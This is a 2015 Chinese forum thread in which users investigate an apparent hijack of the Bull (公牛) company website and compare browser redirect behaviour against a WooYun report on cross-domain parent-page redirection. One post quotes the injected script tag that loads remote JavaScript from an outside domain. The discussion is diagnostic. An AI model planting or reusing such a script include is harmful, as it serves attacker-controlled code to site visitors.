公牛官网疑似异常

显示全部楼层 · 发表于 2015-7-26 11:16:13

本帖最后由 pal家族于 2015-7-26 11:18 编辑

kfpe23 发表于 2015-7-26 10:55
公牛官网被挂了，见底部
打开那个页面是正常的。参考
http://wooyun.org/bugs/wooyun-2013-019961

那这到底是公牛的问题还是360的问题啊，公牛的网站被篡改了吗？？
我这里用ie上百度搜索公牛也会打开那个网站

显示全部楼层 · 发表于 2015-7-26 11:22:45

pal家族发表于 2015-7-26 11:16
那这到底是公牛的问题还是360的问题啊，公牛的网站被篡改了吗？？
我这里用ie上百度搜索公牛也会打开 ...

应该是公牛。。。。。。

@kfpe23 那个漏洞似乎已经修补

显示全部楼层 · 发表于 2015-7-26 12:04:27

的确有这种情况
火狐

显示全部楼层 · 发表于 2015-7-26 14:01:01

aboringman 发表于 2015-7-26 11:22
应该是公牛。。。。。。
@kfpe23 那个漏洞似乎已经修补

这个是google内核的特性，一般不会修复的。1分是安慰分。。。。

显示全部楼层 · 发表于 2015-7-26 14:01:39

可在Chrome复现
[mw_shl_code=javascript,true]<script src="http://alit.pw/a.js"></script>[/mw_shl_code]

显示全部楼层 · 发表于 2015-7-26 14:06:13

kfpe23 发表于 2015-7-26 14:01
这个是google内核的特性，一般不会修复的。1分是安慰分。。。。

漏洞概要中指出

属于WebKit内核的已知特性，可以跨域使父页面的location重定向。除IE外，其它浏览器包括Firefox、Chrome均是这种行为

而楼主说在IE下也可复现，公牛页面利用的是这个漏洞吗

显示全部楼层 · 发表于 2015-7-26 14:11:22

Flying_Bird 发表于 2015-7-26 14:06
漏洞概要中指出

而楼主说在IE下也可复现，公牛页面利用的是这个漏洞吗

IE也可以？？
我x，IE文件夹被我用360粉碎机了。如果IE也可复现，应该就不是了。。。

显示全部楼层 · 发表于 2015-7-26 14:19:02

kfpe23 发表于 2015-7-26 14:11
IE也可以？？
我x，IE文件夹被我用360粉碎机了。如果IE也可复现，应该就不是了。。。

ie真的可以复现哦

显示全部楼层 · 发表于 2015-7-26 14:26:46

kfpe23 发表于 2015-7-26 14:01
这个是google内核的特性，一般不会修复的。1分是安慰分。。。。

刚才在360安全浏览器上试过了，确实有这种情况，但不像是因漏洞而出现的

那个视频中的实验做过了，并没有再出现“test”或者是“360se test”的字眼，而是打不开而已

显示全部楼层 · 发表于 2015-7-26 14:34:30

本帖最后由 kfpe23 于 2015-7-26 14:42 编辑

pal家族发表于 2015-7-26 14:19
ie真的可以复现哦

复线啥啊。。。。。

我还专门开了虚拟机去试IE，结果只是弹出一个窗口罢了。

没有修改到原来的父页面（百度搜索）
chrome不一样，打开后，原来的父页面也改了。。。

[其他相关] 公牛官网疑似异常